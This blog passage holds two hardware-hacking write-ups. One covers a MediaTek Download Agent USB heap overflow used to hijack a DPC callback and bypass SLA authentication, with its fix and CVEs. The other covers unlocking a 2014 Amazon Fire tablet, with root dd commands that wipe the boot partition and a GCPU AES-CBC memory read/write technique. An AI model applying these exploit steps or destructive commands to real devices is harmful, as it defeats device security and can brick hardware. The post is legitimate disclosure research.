The FAR shows 0x6d61263b3b3b747c, which is ASCII for ma&;;;t|, basically corrupted data from the XML expansion overwriting the chunk header.

At first, this seemed promising: if we could control the chunk metadata with the overflow, maybe we could turn this into an arbitrary write during free().

But there's a problem: we can't send arbitrary bytes in the XML filename. Special characters get entity-encoded (& becomes &, etc.), and null bytes get rejected by the XML parser entirely.

To craft a fake chunk header, we'd need to overwrite ptr and size in the alloc_struct_begin with controlled values.

For example, to fake a pointer like 0x40070028, we'd need to send bytes 28 00 07 40 00 00 00 00, but those null bytes are impossible to include in an XML string.

After countless hours of brainstorming, experimenting with different character combinations, and desperately searching for some way to sneak controlled bytes through the XML parser, we finally admitted defeat. The XML overflow, despite its impressive size, simply wasn't exploitable.

Which meant Chimera had to be doing something else entirely. The XML expansion overflow was a red herring, likely included to confuse people like us :P.

(and it actually did, we wasted way more time than we'd like to admit trying to make something useful out of it).

The Real Exploit: USB Overflow

Going back to the USB capture, we focused on why Chimera was aborting the second AIO command instead of completing it normally.

While analyzing more closely, we noticed something odd about how Chimera sends the second AIO file.

According to the V6 protocol, before sending file data, the host advertises how many bytes the DA should expect. Looking at the capture:

4F 4B 40 35 31 31 36 20  ->  "OK@5116"

So they tell the DA they'll send 0x13FC bytes (5116 in decimal). But the actual payload size was 0x2410 bytes, nearly twice as much.

We went back to fp_read_host_file and looked at the download loop more carefully:

advertised_size = atoll(vec[1]); // size from host (0x13fc)

*out_data_len = (uint)advertised_size;
buffer = (char *)malloc(advertised_size + 4); // allocate with 4-byte overhead
*out_data = buffer;

(*channel->write)((uint8_t *)"OK", 3);

if (advertised_size != 0) {
    bytes_received = 0;
    do {
        // ... read OK from host ...
        (*channel->write)((uint8_t *)"OK", 3);
        chunk_len = packet_size; // 0x20000 bytes max per USB packet
        status = (*channel->read)((uint8_t *)(buffer + bytes_received), &chunk_len);
        if (status != 0) goto usb_error;
        bytes_received = bytes_received + chunk_len;
        (*channel->write)((uint8_t *)"OK", 3);
    } while (bytes_received != advertised_size);
}

The DA allocates a buffer based on advertised_size plus a 4-byte overhead (probably for a null terminator or length field), but the read loop uses packet_size (0x20000) for each chunk, not the remaining bytes.

The loop only terminates when bytes_received == advertised_size, so if the host advertises a small size but sends more data than that, the DA will happily write past the end of the allocated buffer.

In Chimera's case:

Host advertises 0x13FC bytes
DA allocates 0x1400 bytes (0x13FC + 4 overhead)
Host actually sends 0x1410 bytes
The DA reads the full chunk, overflowing by 0x10 bytes into the next chunk's header

And since we're sending raw USB data (not XML-encoded strings), we have full control over every byte, including null bytes!

The Write Primitive

On ARM64, the allocated chunk header looks like:

+0x00: ptr   (8 bytes) - pointer to chunk start
+0x08: size  (8 bytes) - allocation size
+0x10: data  (user data starts here)

When free() is called on a chunk, it does:

free:
    cbz    ptr, return           ; if (ptr == NULL) return
    ldp    x8, x9, [ptr, #-0x10] ; x8 = alloc.ptr, x9 = alloc.size
    mov    ptr, x8               ; chunk = alloc.ptr
    str    x9, [x8, #0x10]       ; chunk->len = alloc.size  <-- the write
    b      heap_insert_free_chunk

What matters here is str x9, [x8, #0x10]. It writes alloc.size to alloc.ptr + 0x10.

If we can control both ptr and size in the chunk header through our overflow, we get an arbitrary write primitive: write size to ptr + 0x10.

Targeting DPC

Now we need a target for our write. We need a function pointer at a known address that gets called regularly.

Looking at the DA2 command loop, we found exactly that: the DPC (Deferred Procedure Call) structure. At the end of each command iteration, the DA checks if there's a pending callback:

if (get_cmd_dpc()->cb != 0) {
    LOGD("\n@Protocol: DPC CALL\n");
    get_cmd_dpc()->cb(get_cmd_dpc()->arg);
    // ...
}

The DPC structure is simple:

struct cmd_dpc_t {
    const char *key;
    cmd_dpc_cb cb;   // <- function pointer
    void *arg;
};

It's used by commands that need to do something after the command response is sent, like rebooting or switching USB speed. The structure lives at a fixed address in .bss, and cb gets called if it's non-null.

Perfect target. If we overwrite cb with our shellcode address, the DA will call it for us at the end of the command loop.

On our device, the DPC structure lives at:

0x40070030: key
0x40070038: cb    <- function pointer we want to overwrite
0x40070040: arg

Our overflow writes into the XML filename buffer's header:

0x4530bda8: ptr  = 0x40070028     (0x10 bytes before dpc->cb)
0x4530bdb0: size = shellcode_addr
0x4530bdb8: data = "file_name..." (the huge filename)

When the command is aborted, mxmlDelete cleans up the XML tree and calls free() on the filename buffer. The corrupted header causes free() to:

Read ptr = 0x40070028 and size = shellcode_addr from the header
Execute str x9, [x8, #0x10] -> writes shellcode_addr to 0x40070028 + 0x10 = 0x40070038
0x40070038 is dpc->cb -> shellcode address written!

After the command ends, the DA's main loop checks dpc->cb, sees it's non-null, and calls it, jumping straight into our shellcode.

Putting It All Together

So, to recap the full exploit chain:

Send a first AIO command with our shellcode payload
Send a second AIO command with a crafted filename that shapes the heap
Advertise a smaller size than we actually send, overflowing into the XML filename buffer's header
Set ptr to DPC - 0x10 and size to our shellcode address
Abort the command, triggering mxmlDelete -> free() -> arbitrary write
DPC callback gets overwritten, shellcode executes on next command loop iteration

We called it heapb8 (heapbait), because after getting baited by Chimera's XML overflow decoy, the name just felt right :).

The next step was to make the exploit generic across devices and integrate it into penumbra.

Predicting the Heap Layout

While reimplementing the exploit, we realized the original approach was unnecessarily complicated.

There are two separate allocations involving the filename:

mxml_escape buffer (0x200 bytes, static): Allocated once and reused. The XML expansion overflows this buffer, but since it's static, it doesn't affect heap layout at all.
XML filename node buffer (dynamic): When mxmlLoadString parses the command, it allocates storage for the filename string. This allocation depends on the filename length before escaping, and this is what actually shapes the heap.

The original exploit used a filename stuffed with special characters, presumably to trigger the XML expansion.

But that expansion only affects the static mxml_escape buffer, it has nothing to do with where the filename node ends up on the heap.

What actually matters is the size of the filename when mxmlLoadString sees it. A 5KB filename of & characters? 5KB node allocation. A 5KB filename of A characters? Same thing.

So we simplified, just send a bunch of As. We started small; 1KB, 2KB, 3KB and we kept watching the heap through our hooks until the allocations lined up.

At around 5KB, the XML filename node landed right after our AIO2 buffer, exactly where we needed it.

Same result, far less complexity, though as we later learned, the extra complexity with special characters was intentional obfuscation.

Landing the Shellcode

There's one more challenge we haven't addressed: where exactly does our shellcode land?

The heap base address varies between devices and DA versions. On the Nothing Phone 2A, it starts at 0x4007F100. On other devices, it might be completely different.

And even on the same device, the exact location of our AIO1 buffer depends on what allocations happened before it.

We could try to calculate the exact address by analyzing the DA's initialization sequence, tracking every allocation, and predicting where our shellcode ends up.

But that's fragile, any change in the DA's behavior would break our calculations. Instead, we took the lazy approach: NOP sleds.

The heap is huge, 800MB on every V6 DA we've analyzed. We don't need to land precisely on our shellcode; we just need to land somewhere in front of it.

So we pad our payload with a massive NOP sled (about 10% of the heap size, roughly 80MB of NOPs), then place the actual shellcode at the end. When we overwrite dpc->cb, we point it near the end of the sled, at 95%.

If we land anywhere in the sled, execution slides down through the NOPs until it hits our shellcode. As long as our target address is within the sled, we're good.

We calculate the target address as 95% into the sled, aligned to 4 bytes for ARM:

let sled_size = (heap_params.heap_size / 10) as usize;
let shellcode_addr = (heap_params.heap_base + (sled_size as f64 * 0.95) as u64) & !3;

It's not elegant, but it works reliably across different devices without needing precise heap layout predictions.

Hakujoudai

With code execution achieved, we needed a payload that would give us persistent control over the DA. We called it hakujoudai (白杖代).

The name was shomy's idea, it's a reference to Toilet-bound Hanako-kun, where hakujoudai are supernatural orbs used by ghosts to power up, scout, and take control of spaces beyond their reach.

We thought it fit: we corrupt the heap, leave it for dead, then come back to haunt it.

The Problem

After the exploit triggers, we have a problem: the heap is corrupted.

Remember, we overwrote the XML filename buffer's chunk header with a fake pointer to the DPC region. When free() processed this corrupted chunk, it inserted our fake "chunk" into the free list.

Now the heap's free list contains an entry pointing to 0x40070028, which isn't heap memory at all.

If we just ran arbitrary code and returned, the next allocation or free would try to use this corrupted free list and crash. We need to fix the heap before doing anything else.

Fixing the Heap

The first thing hakujoudai does is repair the damage. It walks the free list and validates each entry.

If a chunk's address falls outside the heap region ([heap_base, heap_base + heap_size]), it's invalid and gets unlinked:

while (iterations++ < max_iter) {
    bool valid = ptr_valid((uintptr_t)curr, (uintptr_t)head, end);
    
    if (valid) {
        // Keep this chunk in the list
        last_valid->next = curr;
        curr->prev = last_valid;
        last_valid = curr;
    } else {
        // Invalid chunk, skip it and clear DPC if needed
        if ((uintptr_t)curr <= base || (uintptr_t)curr > end)
            clear_dpc((uintptr_t)curr);
    }
    
    curr = next;
}

When we encounter our fake chunk (pointing to DPC), we also clear the DPC structure to prevent the callback from firing again:

static void clear_dpc(uintptr_t corrupted_node)
{
    uintptr_t dpc_key_addr = corrupted_node + DPC_KEY_OFFSET;
    memset((void *)dpc_key_addr, 0, DPC_CLEAR_SIZE);
}

Custom Commands

With the heap fixed, we can safely use the DA's API. Instead of reimplementing USB communication from scratch, we hook into the existing command system:

register_major_command("CMD:BOOT-TO", "1", cmd_boot_to);
register_major_command("CMD:EXP-CALL-FUNC", "1", cmd_call_function);
register_major_command("CMD:EXP-PATCH-MEM", "1", cmd_patch_mem);

These three commands give us everything we need:

CMD:BOOT-TO: Downloads and executes DA extensions, second-stage payloads that add functionality to the exploited DA.
CMD:EXP-PATCH-MEM: Writes arbitrary data to any address. Penumbra uses this to patch out security checks directly.
CMD:EXP-CALL-FUNC: Calls any function at a given address. On devices with DA SLA enabled, most commands are only registered after authentication. We use this to invoke the registration function directly, unlocking all commands without passing SLA.

Returning to the Command Loop

The final trick: instead of spinning in our own loop, we return to the DA's original command loop:

dagent_command_loop2();

This means the DA continues running normally, processing commands as usual, except now it also responds to our custom commands. From the host's perspective, it's still talking to a standard V6 DA, just with a few extra capabilities.

Dynamic Address Resolution

You might have noticed the function pointers look suspicious:

static void (*const volatile register_major_command)(...) = (void *)0x11111111;
static void (*const volatile dagent_command_loop2)(void) = (void *)0x22222222;
static volatile uintptr_t heap_struct = 0x33333333;

These are placeholders. Before sending the payload, penumbra analyzes the target DA binary and patches these addresses with the real values:

patch_pattern_str(&mut payload_bin, "11111111", &bytes_to_hex(&params.reg_cmd.to_le_bytes()))?;
patch_pattern_str(&mut payload_bin, "22222222", &bytes_to_hex(&params.cmd_loop.to_le_bytes()))?;
patch_pattern_str(&mut payload_bin, "33333333", &bytes_to_hex(&params.theheap.to_le_bytes()))?;
// ... etc

This makes hakujoudai work across different DA versions without hardcoding addresses.

Results

We integrated everything into penumbra. It parses the DA to extract addresses, calculates heap parameters, builds the payload with the right offsets, and sends it off.

Here's what it looks like from the host:

And on UART, hakujoudai doing its thing, fixing the heap and registering our commands:

After that, penumbra patches out security checks and proceeds normally. Full read/write access, no auth required :)!

From here you can dump partitions, flash images, or unlock the bootloader on devices where the stock DA would otherwise block you.

Fixes

MediaTek patched both vulnerabilities sometime in 2025. We don't know the exact date, but we found two CVEs that appear to match:

CVE-2025-20658: In DA, there is a possible permission bypass due to a logic error. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: ALPS09474894)
CVE-2025-20656: In DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: ALPS09625423)

We suspect the first one corresponds to the USB overflow since the loop condition was technically correct but logically flawed.

And the second one matches the XML expansion overflow since it lacked proper bounds checking when writing to the destination buffer.

However, these are just our assumptions based on the descriptions so take them with a grain of salt.

XML Expansion Fix

The mxml_escape function now allocates a properly sized buffer and checks for overflow before each write:

#define DEST_BUFFER_SIZE (MAX_FILE_NAME_LEN * 6)

if (dest == NULL)
    dest = (char *)malloc(DEST_BUFFER_SIZE);

// ...

for (; i < len; ++i) {
    if ((p - dest) >= (DEST_BUFFER_SIZE - 6)) {
        LOGE("Dest XML file name buffer overflow");
        return "";
    }
    // ... expansion logic ...
}

The buffer is now MAX_FILE_NAME_LEN * 6 to account for worst-case expansion (all " characters becoming "), and it bails out if there's not enough space for another expansion.

USB Overflow Fix

The fp_read_host_file function now calculates the correct number of bytes to read instead of blindly using package_len:

while (xfered < total_length) {
    // ...
    
    len = total_length - xfered;
    len = len >= package_len ? package_len : len;
    
    if (channel->read(buf + xfered, (uint32_t *)&len) != 0) {
        // ...
    }
    // ...
}

Instead of len = package_len, it now calculates the remaining bytes (total_length - xfered) and uses whichever is smaller. This prevents reading more data than the buffer can hold.

The loop condition also changed to prevent issues if xfered somehow overshoots total_length.

Conclusion

This was my first time diving into heap exploitation, and honestly, it was a lot of fun. Frustrating at times, especially those hours wasted on the XML overflow, but incredibly rewarding once everything clicked.

Working with shomy made the whole process more enjoyable. Neither of us had done anything like this before, so it was a lot of trial and error, and "wait, what if we try this?" moments. Somehow it all came together!

Big thanks to @AntiEngineer for the UART work and all the help along the way. Also thanks to @erdilS for lending us the Chimera license that started this whole rabbit hole.

And of course, credit where it's due, the Chimera team found the vulnerability, and even though their obfuscation had us chasing ghosts for a while, they deserve recognition for the original discovery.

The full exploit is available in penumbra and the hakujoudai payload in mtk-payloads!

Feel free to reach out on Telegram or mail if you have questions regarding the exploit (technical ones, please, not "how do I unbrick my bricked XYZ.").

Thanks for reading! If you made it this far, we hope it was worth it!

Hacking a 2014 tablet... in 2024!

Sun, 21 Jul 2024 00:00:00 GMT

Yes, you heard that right, 10 years after its release, I managed to hack and unlock the first MediaTek based Amazon tablet that went on sale, the Amazon Fire HD6 / HD7 2014 (codenamed ariel).

In this article, I'll explain my journey in detail without making it too long. If you prefer to skip ahead and see the source code directly (no judgment, I don't like to read or write much either), you can find it here!

::github{repo="R0rt1z2/amonet" branch="mt8135-ariel" title="Amonet fork for MT8135 based devices"}

Introduction

You might be wondering why I decided to tinker with such an old device, especially after so much time has passed since its release. The reason is simple: its SoC. While MediaTek devices are quite common, this tablet features a unique SoC, the MT8135.

So, what's so special about it? Well, nothing much, really. It feels like a tablet version of the MT6595, which was used in phones like the Meizu MX4. The real interest lies in the fact that no one has managed to unlock this device due to its unique quirks which we'll see as soon as the article develops.

Getting the device

Although it may sound stupid, the first problem I encountered was finding the device, as it was never sold in Spain. In total, throughout my journey, I acquired two HD7s and two HD6s (one of which eventually died).

The first unit was purchased from Wallapop, a popular platform for buying and selling second-hand products in Spain. The two HD7s were bought from eBay and imported directly from the U.S., which cost me quite a bit. The former HD6 was generously donated by kip_dynamite, to whom I owe a huge thanks.

Analyzing the firmware

As seen on other Amazon devices, this tablet runs a heavily modified version of Android called FireOS. To my surprise, it was released with FireOS 4 (based on Android 4) but received an update to FireOS 5 (based on Android 5.1.1).

Given that this is such an old device, I assumed its firmware would be similar to the 2015 Fire 7. So, I proceeded to download the latest stock firmware available for this device and extracted it. The result surprised me because something very important seemed to be missing... or at least that was my initial impression.

r0rt1z2@r0rt1z2-pc:~/Downloads/update$ tree -L 2
.
├── boot.img
├── file_contexts
├── images
│   ├── lk.bin
│   └── tz.img
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   ├── com
│   └── MANIFEST.MF
├── ota.prop
├── system
│   └── build.prop
├── system.new.dat
├── system.patch.dat
└── system.transfer.list

5 directories, 12 files

In case you haven't noticed, the Preloader image is missing. As I mentioned before, this device has quite a few special quirks, and this is one of them.

After realizing the Preloader was missing, I decided to do some research and came across an XDA thread that provided the location of TX and included a few UART logs from an HD6. Fortunately, one of the log links was still working, allowing me to understand how the boot chain worked on this device.

[PL0] Build Time: 20140829-000812

That is the very first line of the log. It looks like the PreLoader printing its build time, but what does that 0 stand for? If we read a few more lines, we can find the answer to that question:

[PL0] Build Time: 20140925-030705 
[SD0] Bus Width: 1 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0) 
[SD0] Switch to High-Speed mode! 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0) 
[SD0] Bus Width: 8 
[SD0] Size: 14910 MB, Max.Speed: 52000 kHz, blklen(512), nblks(30535680), ro(0) 
[SD0] Initialized 
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0) 
msdc_ett_offline_to_pl: size<2> m_id<0x15> 
msdc <0> <HYNIX > <MAG2GC> 
msdc <1> <xxxxxx> <MAG2GC> 
msdc failed to find 
=========use hc erase size 
[PL0] Init MMC: OK(0) 
[ROM_INFO] 'v2','0x3100000','0x20000','0x3D80000','0x2C00' 
[PART] 1: 00000100 00000040 'PRO_INFO' 
[PART] 2: 00002000 00000800 'PMT' 
[PART] 3: 00002800 00002800 'TEE1' 
[PART] 4: 00002800 00005000 'TEE2' 
[PART] 5: 00000400 00007800 'UBOOT' 
[PART] 6: 00004000 00007C00 'boot_x' 
[PART] 7: 00004000 0000BC00 'recovery_x' 
[PART] 8: 00000800 0000FC00 'KB' 
[PART] 9: 00000800 00010400 'DKB' 
[PART] 10: 00000400 00010C00 'MISC' 
[PART] 11: 00008000 00011000 'persisbackup' 
[PART] 12: 00258000 00019000 'system' 
[PART] 13: 0019A000 00271000 'cache' 
[PART] 14: 0000F000 0040B000 'boot' 
[PART] 15: 0000F000 0041A000 'recovery' 
[PART] 16: 018F3FDF 00429000 'userdata' 
[PL0] loading partition 'TEE1' offset=00300000 at address=12001000 
[PART] Image with part header 
[PART] name : PL1 
[PART] addr : FFFFFFFFh 
[PART] size : 112636 
[PART] magic: 58881688h 
[PART] load "2" from 0x0000000001800200 (dev) to 0x12001000 (mem) [SUCCESS] 
[PART] load speed: 21999KB/s, 112636 bytes, 5ms 
[PL0] Load PL1 from  partition 'TEE1'@ 8X: err=3145728 
[PL0]RSA2048 signature for PL1[key0]: (img_size 112380) 
[PL0]image verification passed for PL1[key0] 
[PL0] PL1 Load OK from TEE1: err=0 
[PL0] jump to 12001000

Apparently, Preloader is divided into two different stages:

PL0: This stage initializes the eMMC, sets up the clock and bus width, and parses the GPT to identify partitions. It then loads and verifies PL1 from the TEE1 partition before jumping to execute it.
PL1: This stage initializes the PMIC, I2C, performs hardware checks, sets up the RTC, DRAM, and initializes the boot device. It then verifies and loads LK and TEE images, performs cryptographic checks, and sets up the boot arguments. Finally, it jumps to the TEE image to continue the boot process.

With this information, I extracted the latest PL1 image from the tz.img we previously downloaded. Knowing its offset is 0x00300000 (as seen in the UART log), I used UNIX dd to cut the image:

r0rt1z2@r0rt1z2-pc $ dd if=tz.img of=PL1.img bs=1 skip=$((0x300000))
113328+0 records in
113328+0 records out
113328 bytes (113 kB, 111 KiB) copied, 0.234714 s, 483 kB/s
r0rt1z2@r0rt1z2-pc $ hexdump -C PL1.img | head -n5
00000000  88 16 88 58 b0 b8 01 00  50 4c 31 00 00 00 00 00  |...X....PL1.....|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00  ff ff ff ff ff ff ff ff  |................|
00000030  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
r0rt1z2@r0rt1z2-pc: $

Success! We've obtained a clean dump of the second Preloader stage image. Regarding the other parts of firmware, everything was similar, if not identical, to the Fire 7 2015. Both LK and the rest of the TZ function the same way, and FireOS has the same structure. For those interested, I have uploaded a full dump on my dumpyard.

Rooting the device

To play it safe, I thought it would be best to root the device. Before acquiring it, I read XDA and informed myself about the available options.

The latest versions of FireOS 5 are not rootable, but it's always possible to downgrade (without bricking) to FireOS 4.5.3 and root from there using KingoRoot (yes, I also hate these one-click root solutions too; they are the worst).

The problem with this method is that KingoRoot requires an internet connection. If you connect to some Wi-Fi while on 4.5.3, Amazon will automatically (and instantly) download a software update and subsequently install it, causing a hard brick on the device (I'm speaking from experience :D).

To avoid this, I decided to sniff out and extract whatever KingoRoot's black magic is, and put everything together into a ZIP file to create a safe offline rooting method. This method directly installs SuperSU instead of the usual Chinese bloatware! I won't go into details here, but if you want to see how it works, check out this XDA thread.

shell@ariel:/data/local/tmp $ su
root@ariel:/data/local/tmp # id
uid=0(root) gid=0(root) context=u:r:init:s0
root@ariel:/data/local/tmp #

(g0t r00t!)

Accessing UART

As I mentioned earlier, an XDA user had posted the TX location on the HD6 board a few years ago, which made my life easier.

I decided to open up my HD7 to try to solder the TX connection, allowing me to more easily debug amonet, as UART is usually necessary for this process. I opened the back of the device and the first thing I found was a completely different PCB layout, which scared the hell out of me. Did this mean that finding the TX would not be as easy as I had hoped?

Thankfully, my fears were unfounded. In the picture posted by the XDA user, you could see that the TX was part of what looked like a JTAG test point labeled JDEBUG1. After a quick inspection of my HD7 board, I noticed the same label was present so my partner helped me to solder the pin in the same position as shown in the XDA image.

To be able to close the back of the tablet, we made a hole in the right side of the chassis and carefully passed both cables through it. The result was pretty solid, and it still holds up just fine as I'm writing this article!

I plugged in the device and... voila! UART was working just fine, I was able to read the output of PL0, PL1 and the rest of bootloader images:

[21:50:51.343] Waiting for tty device..
[21:50:56.839] Connected to /dev/ttyUSB0
[PL0] Build Time: 20140925-030705
[SD0] Bus Width: 1

Accessing bootROM mode

Typically, on such devices, we'd use the first stage of amonet, which exploits a vulnerability in bootROM to upload and execute custom payloads. However, to do this, we'd need to access USDBL mode first, which is something nobody has been able to achieve on this particular device.

Volume keys

I decided to run strings on the previously extracted PL1 image to check for any references to USBDL mode, and I found the following:

r0rt1z2@r0rt1z2-pc:~$ strings PL1.img | grep -e "emergency" -e "download"
%s exit emergency dl mode due to time-out (%d ms, %d ms)
download keys are pressed
[RTC] clear emergency dl mode flag in rtc register
[RTC] emergency dl mode flag in rtc register is detected
%s emergency download mode(timeout: %ds).
[RTC] use pl dl mode for emergency dl mode
r0rt1z2@r0rt1z2-pc:~$

Technically, if the image wasn't lying, this mode should be accessible through the volume rocker, similar to the first versions of the Fire 7 2015's Preloader. So, I decided to give it a try:

r0rt1z2@r0rt1z2-pc:~$ lsusb | grep MT
Bus 003 Device 007: ID 0e8d:3000 MediaTek Inc. MT65xx Preloader
r0rt1z2@r0rt1z2-pc:~$ lsusb

After a few tries, I concluded no MT6627 (which is what bootrom identifies with) showed up at all, so this probably got patched by Amazon :(

Erasing Preloader from the eMMC

The next thing I tried was quite risky, but as we say in Spanish, "quien tenga miedo a morir, que no nazca" (those who fear death should not be born). It involves erasing /dev/block/mmcblk0boot0 so that bootROM fails to load the Preloader and falls back to USBDL mode:

root@ariel:/ $ echo 0 > /sys/block/mmcblk0boot0/force_ro 
root@ariel:/ $ dd if=/dev/zero of=/dev/block/mmcblk0boot0 bs=512 count=8
8+0 records in
8+0 records out
4096 bytes transferred in 0.001 secs (4096000 bytes/sec)
root@ariel:/ $ echo -n EMMC_BOOT > /dev/block/mmcblk0boot0
root@ariel:/ $ reboot -p

... and it booted back to the OS, as if nothing happened! I double checked mmcblk0boot and it remained intact so... what's exactly going on here?

After hours of research, I discovered that the persisbackup partition seemed to contain factory logs from when the device was first programmed and this is what I found:

Boot Area Write protection [BOOT_WP]: 0x04
  Power ro locking: possible
  Permanent ro locking: possible
  partition 0 ro lock status: locked permanently
  partition 1 ro lock status: not locked

Looks like Amazon locked down the first stage of Preloader on purpose... but why? That's something I discovered after hard bricking my Fire HD6.

Shorting the eMMC

I really didn't want to go to this extreme, as I only had my first HD6 at the time, but I decided to be brave and disassemble the device. Considering this method is meant to work in 100% of cases unless USBDL mode was disabled, I wondered: this is a 2014 device—did Amazon really disable it, like on newer models?

As seen in the picture (courtesy of iFixit), everything is protected (or covered) by a soldered metal shield, so I had to use my soldering iron. Since I'm not very skilled at soldering, I asked my partner, who has excellent soldering skills, to help me with this.

The result was fairly good, except for the fact that we accidentally ripped off what seemed to be a capacitor related to the screen.

After that, I started playing the lottery (a very bad mistake—DON'T ever try this at home) with what I thought could be CLK, CMD, or even DAT0. Unfortunately, after a few shorts, I ended up killing the device to the point where it wouldn't even try to boot. So, there goes my first unit :D

UART. What's going on?

Since we had already found TX (which is enough to read UART logs), I decided to see what was happening when trying to access USBDL mode, either by shorting or using the volume rocker. Here's what I discovered:

key 1 is pressed
[LIB] invalid susbdl config '0xEA000007'
<ASSERT> seclib_dl.c:line 62 0
[PLFM] preloader fatal error...

That's what happens when you press the volume down key while connecting the device to the PC. Apparently, the Preloader detects the key press and triggers an assert, which should cause a reboot to bootROM mode. Unfortunately, in my case, it rebooted normally :(

Exploiting the Preloader

Having concluded that USBDL mode was not accessible, I decided to focus on exploiting the Preloader to gain arbitrary code execution and subsequently upload my own payloads.

Since we know that both the Preloader and bootROM support the same commands, I decided to use the same method as the one employed for the Fire HD8 2018, which exploited the GCPU to read and write memory addresses arbitrarily.

My initial goal was to dump the bootROM, but as you'll see later, I failed miserably. However, I did manage to achieve code execution in the Preloader, which is a significant result nonetheless. :)

What's bootROM?

After the CPU initializes, the internal SRAM controller pushes a jump instruction to the bootROM address. This is the first code that runs on the device, and it can't be modified. The bootROM takes care of initializing basic hardware such as flash storage, UART1 (the first serial port), loading the Preloader into the On-Chip SRAM, and jumping to it.

While bootROM is usually located at 0x0, there are certain cases where that address contains a direct jump to either 0x00400000 or 0x48000000, as seen in bypass_payloads.

r0rt1z2@r0rt1z2-pc:~ $ hexdump -C 6572_0x0.bin | head -n 1
00000000  04 f0 1f e5 00 00 40 00  00 00 00 00 00 00 00 00  |......@.........|
r0rt1z2@r0rt1z2-pc:~ $

As seen above, the MT6572 contains the instruction 04 f0 1f e5, which translates (HEX -> ARM) to LDR pc, [pc, #-4]. This instruction loads the value from address 0x4 into the program counter (PC). Since this value is 0x00400000, the instruction effectively redirects execution to the actual bootROM code.

Dumping bootROM is no easy task, as it requires you to do so within a privileged context. To understand what I mean, let's take a look at the ARM developer documentation:

In the ARMv7 architecture, the processor mode can change under privileged software control or automatically when taking an exception. When an exception occurs, the core saves the current execution state and the return address, enters the required mode, and possibly disables hardware interrupts.

Applications operate at the lowest level of privilege, PL0, previously unprivileged mode. Operating systems run at PL1, and the Hypervisor in a system with the Virtualization extensions at PL2. The Secure monitor, which acts as a gateway for moving between the Secure and Non-secure (Normal) worlds, also operates at PL1.

To make things easier to understand, let's just say that on the MT8135, which is ARMv7-based, both the Preloader and the TEE run at the most privileged state. Meanwhile, the Little Kernel (second bootloader) and the kernel operate at a lower privilege level.

Understanding the GCPU exploit

The GCPU is a SoC peripheral designed for decrypting encrypted media, featuring a microcontroller core (Control CPU or CCPU) equipped with ROM, SRAM, and hardware accelerators for various cryptographic algorithms including AES, SHA, MD5, RC4, DES, CRC32, and DMA.

The Control CPU (its microcontroller core) operates with a 22-bit instruction set and includes 32 general-purpose 32-bit registers, instruction ROM, instruction RAM, and data RAM.

Direct interaction with the GCPU is achieved by writing to its memory-mapped registers within the SoC's address space. During the boot process, at least on Amazon devices, both the Preloader and the LK (bootloader) use the GCPU to verify the integrity of the images before loading them into memory. As usual, further reverse engineering of this process can provide deeper insights into the GCPU's functionality :)

In my first attempts to dump bootROM, I didn't have arbitrary code execution capabilities in the LK. Thus, my access to the GCPU was solely through the Preloader.

For my device, an older Preloader version exposed two commands to read and write memory addresses within a predefined range; CMD_READ32 and CMD_WRITE32

As seen in the amonet source code, these can be used to read from and write to the GCPU's registers, and thus trigger cryptographic operations.

To grasp how bootROM data was successfully dumped back then, we need to delve into the intricacies of AES-CBC (Cipher Block Chaining) mode utilized during the decryption processes.

Reading data

AES-CBC mode is a common encryption technique where data is encrypted block by block. Each block of data is XORed with the ciphertext of the previous block before it is encrypted.

During decryption, each block of ciphertext is decrypted and then XORed with the previous block's ciphertext to reconstruct the plaintext. The very first block, however, uses an Initialization Vector (IV) in place of previous ciphertext, setting the stage for the encryption or decryption sequence.

In this scenario, the attacker sets the IV to zero. This is basically done so when the first block is decrypted, the absence of a previous ciphertext block means the plaintext is directly revealed and gets decrypted without any alterations, making it plainly visible.

For example, let's consider a situation where at address 0x0 the data looks like this:

0xDEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE13371337

This data represents two blocks of encrypted information (16 bytes each, given typical AES block size). If we set the IV to zero, the decryption would proceed as follows:

Decryption of the first block:
- Ciphertext Block (C1): DEADBEEFCAFEBABE13371337DEADBEEF
- IV: 00000000000000000000000000000000 (set to zero)
- Assume the AES decryption of C1 produces a block we'll call D1
- Plaintext Result (P1): Since the IV is zero, P1 is equal to D1
  - (Normally, you'd see an XOR step here, but with an IV of zero, it simply doesn't alter the output)
Decryption of the second block:
- Ciphertext Block (C2): CAFEBABE13371337DEADBEEFCAFEBABE
- IV: DEADBEEFCAFEBABE13371337DEADBEEF (previous ciphertext block)
- Assume the AES decryption of C2 produces a block we'll call D2
- Plaintext Result (P2): The decrypted output D2 is XORed with the previous ciphertext C1
  - (The XOR operation mixes D2 with the first block's ciphertext, revealing the plaintext for this block)

With the IV set to zero, the first block's plaintext is directly revealed, and each subsequent block's decryption is influenced by the ciphertext of the block before it. This is essentially what allowed xyz to dump the bootROM in chunks of 16 bytes at a time, since one could read out the generated plaintext after the first block was decrypted.

Writing data

A similar process can be used to arbitrarily write data to memory in chunks of 16 bytes using AES-CBC mode. In order to archieve this, a fixed pattern is defined for XOR operations:

pattern = bytes.fromhex("4dd12bdf0ec7d26c482490b3482a1b1f").

This pattern is used to manipulate the data before it's actually processed by the AES decryption function. Following that, the 16 bytes of data are split into four 4-byte (32-bit) words.

Each word is XORed with the corresponding word from the pattern. This XOR operation prepares the data in such a way that, when decrypted, it will result in the desired plaintext.

In addition to that, the source address for the operation is set to 0, which has to be a valid address containing all zeroes. The destination address is set to the target address addr, where the data should be written to. Lastly, another AES decryption gets triggered, which writes the manipulated data to the target address.

For example, let's assume the attacker wants to write the following 16 bytes of data to the target address 0x1000:

0xCAFEBABE13371337DEADBEEFCAFEBABE

This data represents 16 bytes of information. If we follow the process outlined above, the data is manipulated as follows:

Split the data into four 4-byte words:
- 0xCAFEBABE
- 0x13371337
- 0xDEADBEEF
- 0xCAFEBABE
Each word is XORed with the corresponding word from the pattern:
